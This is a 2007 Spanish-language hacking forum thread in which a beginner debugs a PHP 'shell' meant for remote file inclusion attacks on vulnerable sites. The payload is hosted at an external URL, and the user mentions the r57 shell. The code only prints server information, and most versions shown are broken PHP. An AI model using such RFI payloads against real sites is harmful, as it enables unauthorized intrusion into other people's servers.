Título: Problema programacion de shell RFI
Publicado por: skapunky en 10 Julio 2007, 17:31 pm
Buenas, he empezao con estos temas del RFI hace relativamente poco, esta mañana me animado a crear una sencillisima shell en php, pero al usar-la con paginas vulnerables no me carga la información que pido que me muestre. Quiza es un error que he hecho al usar el php o el html y hay algo que se me escapa. Agradeceria si alguien me puede guiar o decir el error. La shell la e alojado por si alguien quiere probar y ver que no devuelve valores: http://xukynet.freehostia.com/x69.txt El codigo de la shell es el siguiente: <?php
//*****************************************************************************************
//* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
//*****************************************************************************************
//* __$$$$$$____________________________$$$$$________ *
//* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
//* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
//* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
//* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
//* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
//* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
//* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
//* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
//* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
//* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
//* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
//* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
//* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
//* *
//* License Freeware, x69.txt *
//*****************************************************************************************
<html>
<body>
<?php
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
?>
</body>
</html>
?> Gracias de antemano, quiza es un problema que falta algun ECHO... haber si alguien me puede ayudar. Saludos.
Título: Re: Problema programacion de shell RFI
Publicado por: yeikos en 10 Julio 2007, 17:55 pm
Dentro de las etiquetas <?php y ?> solo puede haber código en PHP, si quieres escribir en HTML deberás hacerlo mediante echo... <?php
//*****************************************************************************************
//* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
//*****************************************************************************************
//* __$$$$$$____________________________$$$$$________ *
//* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
//* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
//* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
//* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
//* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
//* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
//* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
//* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
//* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
//* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
//* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
//* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
//* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
//* *
//* License Freeware, x69.txt *
//*****************************************************************************************
?>
<html>
<body>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
</body>
</html>
Título: Re: Problema programacion de shell RFI
Publicado por: skapunky en 10 Julio 2007, 18:07 pm
Esacto, esque en una de mis pruebas en el codigo html le e puesto echo y tampoco me ha funcionado. Aqui dejo el codigo como lo tengo puesto ahora: <?php
//*****************************************************************************************
//* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
//*****************************************************************************************
//* __$$$$$$____________________________$$$$$________ *
//* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
//* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
//* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
//* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
//* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
//* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
//* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
//* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
//* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
//* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
//* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
//* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
//* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
//* *
//* License Freeware, x69.txt *
//*****************************************************************************************
echo <html>
echo <body>
echo Información :
echo <br>
<?php
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br>
<b>Server Name:</b> <? echo $SERVER_NAME ?> <br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br>
<b>Server Port:</b> <? echo $SERVER_PORT ?> <br>
<b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br>
<b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br>
<b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br>
<b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
?>
echo </body>
echo </html>
?> Gracias por la ayuda. Ahora con esto asi se me ve igual...no se ven los valores de los parametros que pido en el codigo :-\ Mira, ahora al utilizarlo en una pagina vulnerable, e probao otros como el r57 y va perfectamente, al udsar el mio este x69, me sale lo siguiente dentro la pagina vulnerable: Parse error: parse error, expecting `','' or `';'' in http://xukynet.freehostia.com/x69.txt on line 26 No entiendo ese error....
Título: Re: Problema programacion de shell RFI
Publicado por: yeikos en 10 Julio 2007, 18:59 pm
Deberías de leerte algún manual de PHP, no tienes mucha soltura con éste... <?php
echo "<b>Server Software: </b>".$SERVER_SOFTWARE.
"<br><b>Server Name: </b>".$SERVER_NAME.
"<br><b>Server Protocol: </b>".$SERVER_PROTOCOL.
"<br><b>Server Port: </b>".$SERVER_PORT.
"<br><b>CGI usada por el servidor: </b>".$GATEWAY_INTERFACE.
"<br><b>Directorio Root: </b>".$DOCUMENT_ROOT.
"<br><b>Tipo de conexión: </b>".$HTTP_CONNECTION.
"<br><b>Dirección IP Remitente: </b>".$REMOTE_ADDR;
?>
Título: Re: Problema programacion de shell RFI
Publicado por: Ertai en 10 Julio 2007, 20:07 pm
Las variables de entorno se guardan en un array llamado $_SERVER.
Llama a cada uno usando... $_SERVER['SERVER_PORT'], etc, etc...
Saludos y leete algun manual de PHP.
Título: Re: Problema programacion de shell RFI
Publicado por: skapunky en 10 Julio 2007, 23:53 pm
Ya he mirado, que se be que hay una nueva forma de declarar las variables...esque hice php hace algunos años y tampoco muy extenso... Siento por preguntar tanto, pero bueno, por algo se empieza. De momento tengo esto y la pagina vulnerable no me muestra nada: <?php
//*****************************************************************************************
//* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
//*****************************************************************************************
//* __$$$$$$____________________________$$$$$________ *
//* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
//* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
//* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
//* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
//* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
//* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
//* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
//* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
//* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
//* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
//* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
//* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
//* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
//* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
//* *
//* License Freeware, x69.txt *
//*****************************************************************************************
echo <html>
echo <body>
echo Información :
echo <br>
<?php
echo "<b>Server Software: </b>" $_server['SERVER_SOFTWARE'];
"<br><b>Server Name: </b>" $_server['SERVER_NAME'];
"<br><b>Server Protocol: </b>" $_server['SERVER_PROTOCOL'];
"<br><b>Server Port: </b>" $_SERVER['SERVER_PORT'];
"<br><b>CGI usada por el servidor: </b>" $_server['GATEWAY_INTERFACE'];
"<br><b>Directorio Root: </b>" $_server['DOCUMENT_ROOT'];
"<br><b>Tipo de conexión: </b>" $_server['HTTP_CONNECTION'];
"<br><b>Dirección IP Remitente: </b>" $_server['REMOTE_ADDR'];
?>
echo </body>
echo </html>
?> Alguien sabe almenos como puedo testear si funciona?. Gracias por adelantado.
Título: Re: Problema programacion de shell RFI
Publicado por: yeikos en 11 Julio 2007, 00:07 am
PHP es case sensitive es decir, no es lo mismo $a que $A, partiendo de eso, $_server['SERVER_NAME'] no es lo mismo que $_SERVER['SERVER_NAME'], ya que SERVER debe de estar escrito en mayúsculas.
También he de decir a Ertai que es lo mismo $_SERVER['SERVER_NAME'] que $SERVER_NAME...
skapunky, el último código que escribí funciona correctamente, no se porque no lo utilizas.
¿Como saber si el código funciona correctamente? Sube el código a cualquier servidor con soporte PHP y si te carga todo correctamente también lo hará cuando hagas el include().
Título: Re: Problema programacion de shell RFI
Publicado por: skapunky en 11 Julio 2007, 00:51 am
Bueno, despues de muxo provar e creado un host con php y me sale un error de sitaxis..el error es el siguiente: Parse error: syntax error, unexpected T_VARIABLE in /data/members/free/tripod/es.... El codigo empleado es: <?php
/*
*****************************************************************************************
* PHP shell writted by skapunky , 2007 :: Exploit RFI :: *
*****************************************************************************************
* __$$$$$$____________________________$$$$$________ *
* __$$$$$$$$*_____________________,,$$$$$$$$*___ *
* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ *
* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ *
* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ *
* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ *
* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ *
* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ *
* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ *
* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ *
* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ *
* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ *
* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ *
* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ *
* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ *
* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ *
* *
* License Freeware, x69.txt *
*****************************************************************************************
*/
"<b>Server Software: </b>" $_SERVER['SERVER_SOFTWARE'];
"<b>Server Name: </b>" $_SERVER['SERVER_NAME'];
"<b>Server Protocol: </b>" $_SERVER['SERVER_PROTOCOL'];
"<b>Server Port: </b>" $_SERVER['SERVER_PORT'];
"<b>CGI usada por el servidor: </b>" $_SERVER['GATEWAY_INTERFACE'];
"<b>Directorio Root: </b>" $_SERVER['DOCUMENT_ROOT'];
"<b>Tipo de conexión: </b>" $_SERVER['HTTP_CONNECTION'];
"<b>Dirección IP Remitente: </b>" $_SERVER['REMOTE_ADDR'];
?> La linia 31 tiene puesto el punto y coma...no se cual debe ser el error,aps e quitado todo el codigo html para que sea mas sencillo esto y evitar posibles errores. Saludos. PD: si le pogo el comando echo antes de la linia del server software me sale el sigueinte error: Parse error: syntax error, unexpected T_VARIABLE, expecting ',' or ';' in /data/members/free/tripod........ Gracias.
Título: Re: Problema programacion de shell RFI
Publicado por: yeikos en 11 Julio 2007, 00:56 am
No tienes ni idea de PHP y este no es el lugar para hablar de esto.
Si de verás te interesa el tema leete por lo menos un manual porque no sabes hacer ni lo elemental, será mejor que cierren el tema, suerte.
Título: Re: Problema programacion de shell RFI
Publicado por: skapunky en 11 Julio 2007, 01:39 am
TEMA RESUELTO
Lo que fallava eran las etiquetas de negrita y <br>.... En cuanto lo otro va perfectamente.
|